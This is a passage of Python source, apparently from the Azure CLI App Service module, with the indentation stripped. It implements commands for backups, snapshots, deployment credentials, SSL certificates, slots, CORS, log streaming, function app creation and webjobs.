db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
elif any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
else:
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
elif any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
return sku
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.mgmt.resource import ResourceManagementClient
client = get_mgmt_service_client(cli_ctx, ResourceManagementClient)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
for profile in profiles:
if profile['publishMethod'] == 'MSDeploy':
scmUrl = profile['publishUrl'].replace(":443", "")
cd_url = 'https://' + profile['userName'] + ':' + profile['userPWD'] + '@' + scmUrl + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
break
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
elif action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
else: # reset
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_suffix = '.' + site.default_host_name.split('.', 1)[1]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file):
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get')
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, location,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=location)
name = '{}({})'.format(webapp_name, slot) if slot else webapp_name
return _generic_site_operation(cli_ctx, resource_group_name, name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, sku,
number_of_workers=None, location=None, tags=None):
# This command merely shadows 'az appservice plan create' except with a few parameters
return create_app_service_plan(cmd, resource_group_name, name, is_linux=None, hyper_v=None,
sku=sku, number_of_workers=number_of_workers, location=location, tags=tags)
def is_plan_Elastic_Premium(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, consumption_plan_location=None,
app_insights=None, app_insights_key=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
# for linux consumption plan app the os_type should be Linux & should have a runtime specified
# currently in other cases the runtime is ignored
if is_linux and not runtime:
raise CLIError("usage error: --runtime RUNTIME required for linux functions apps with consumption plan.")
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
elif not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
if consumption_plan_location:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
else:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='beta'))
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
site_config.linux_fx_version = _format_fx_version('appsvc/azure-functions-runtime')
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION', value='8.11.1'))
if consumption_plan_location is None and not is_plan_Elastic_Premium(plan_info):
site_config.always_on = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
"created but is not active until content is published using"
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
return functionapp
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name.value
allowed_storage_types = ['Standard_GRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(deployment_status_url, authorization, timeout=None):
import requests
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization)
res_dict = response.json()
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
raise CLIError("Zip deployment failed.")
elif res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
raise CLIError("""Deployment is taking longer than expected. Please verify
status at '{}' beforing launching the app""".format(deployment_status_url))
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
